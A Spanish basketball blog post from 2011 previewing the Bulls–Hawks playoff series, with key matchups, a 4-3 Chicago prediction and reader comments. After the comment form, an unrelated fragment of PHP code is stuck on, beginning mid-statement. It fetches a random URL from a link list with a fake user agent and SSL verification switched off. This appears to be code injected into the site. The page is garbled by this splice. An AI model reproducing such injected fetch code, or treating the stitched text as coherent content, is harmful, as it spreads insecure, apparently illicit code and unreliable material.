Análisis Chicago Bulls vs Atlanta Hawks

02 de May de 2011 por TheDeerHunter

Regular: 2-1 Bulls

Chicago 98.6 PF – 91.3 PC
Atlanta 95 PF – 95.8 PC

Oportunidad única para dos franquicias con solera. Ninguno de estos dos campeones han vuelto a una final de conferencia desde hace demasiados años. Los Bulls no la pisan desde que se retiró Michael Jordan. Los Hawks desde que antes que se llamara conferencia, cuando con ellos jugaba un tal Pete Maravich. Y desde entonces han caído eliminados un total de 11 ocasiones en esta ronda. Uno de ellos romperá por fin esa pésima racha.

Se antoja que la cuestión psicológica podría jugar un papel decisivo y no sólo por esa oportunidad histórica a la que hemos hecho referencia. Ambos equipos llegan a estas alturas de temporada con los deberes hechos y los objetivos iniciales cumplidos. Nadie les podría haber exigido al principio alcanzar una final de conferencia. Además los Bulls se enfrentan a la presión añadida de hacer valer su condición de campeón de la regular, mientras que los Hawks ya tienen la condición de matagigantes habiendo sacado partido a eso de “mucho que ganar y poco que perder”. Lo pueden seguir haciendo. En la regular también se observó este aspecto, con las dos palizas que le endosaron los Bulls a Atlanta con el “modo relax” puesto. Como advertimos en la anterior serie es una actitud que sus rivales no podrán esperar en estos momentos.

Los Hawks son un equipo con ciertas dificultades anotadoras, el peor en este aspecto de los que quedan vivos, y además ahora deberán medirse a los exigentes sistemas defensivos del Entrenador del Año. Los Bulls, por su parte, sin haber brillado demasiado, han sido uno de los equipos más prolíficos de primera ronda, sin embargo harán frente a una de las defensas más efectivas de lo que llevamos de postemporada. Va a resultar interesante.

Claves de la eliminatoria:

– Aspecto mental/agresividad: Ya hemos hecho mención a este aspecto. Quien controle mejor sus emociones tendrá media eliminatoria ganada. En este sentido vamos a disfrutar de un duelo del que pueden saltar chispas: Noah vs Pachulia. Cuidado con el perro. Puede parecer que los Hawks parten con cierta ventaja.

– Posición de base: Tenemos al MVP de la regular frente a un equipo con una posición tradicionalmente delicada. Hinrich se lesionó en el último partido de la serie contra Orlando y es duda. No le pidáis a Crawford secar a Rose. Si la suerte de la eliminatoria está en las manos de Jeff Teague los Bulls lo tienen hecho.

– Factor Boozer: Los Bulls andan con la mosca tras la oreja con el rendimiento de Carlos Boozer. De momento no ha sido él el factor desequilibrante que vale 14 millones de dólares y medio. Independientemente de los problemas físicos, ha estado bastante irregular en la temporada y tampoco ha llegado a defender como le exige Thibodeau. La primera ronda ha sido bastante decepcionante por su parte. Horford tampoco lo ha pasado bien contra Orlando pero es un gladiador. Si Boozer no se pone las pilas será devorado.

– Las alas: La gran baza de los Hawks son sus aleros. Los Bulls necesitarán la mejor versión defensiva de Deng, Bogans, Brewer… y Korver.

– El banco: A Thibodeau no le ha hecho falta una gran producción de su segunda unidad en la anterior serie. Con Crawford delante ese será un aspecto decisivo, como ya lo ha comprobado en sus carnes Van Gundy.

Pronóstico: 4-3 Chicago

Comenta

7 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Yo aquí veo una eliminatoria mas clara para Chicago, las virtudes de los Hawks estan muy alejadas de poder para a Rose y es el quien debe dominar la serie. Desde luego una buena versión de Boozer tiene que aparecer ya y al resto se les ha visto a buen nivel en 1ª ronda.

    Atlanta tendrá que aprovechar a Crawford&Johnson que en principio tienen ventaja sobre sus pares, y globalmente poner el 1000% de agresividad.

      Citar

  2. JHC dice:
    #2

    Bueno esta si la veo más complicada para mis Hawks pues va costar mas parar a Rose, si utilizara el sistema anterior utilizado con los Magic seria dejar hacer a rose secando al resto y eso lo veo mas dificil. Pero bueno habra que luchar y conseguir alguna victoria, cimentada en que crawford pueda defender a Rose

      Citar

  3. ralage dice:
    #3

    Sinceramente ni dejando en un 25% de acierto en el triple a los Bulls, gana 3 partidos Atlanta,
    y es que, ¿quién va a defender a Rose?
    Además, tambien sufrirán en el rebote, y eso combinado con malos porcentajes de JJ o de JCrawford le dará partidos directamente a los Bulls.
    4-1 Chicago

      Citar

  4. Ru dice:
    #4

    Me huelo que Atlanta se pondrá en “modo PO” y podrían llegar al 7º partido pero me quedo con el 4-2,por esa variable Rose que no parece que sean capaces de parar en Atlanta.Pachulia vs Noah…cuidado Chuck Norris,xDD

      Citar

  5. Javijaen dice:
    #5

    También apuesto por un 4-3 para Chicago, ya que Rose no tiene par. De todas formas se espera a Boozer, si este empieza a carburar la eliminatoria sería más corta…

      Citar

  6. Tobal dice:
    #6

    Veo muy favoritos a Chicago,el factor Rose será determinante y no veo a ningún jugador de Atlanta,que pueda defenderlo bién.

      Citar

  7. Sr. Lagarto dice:
    #7

    Pues al igual que LA, la primera en la frente…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>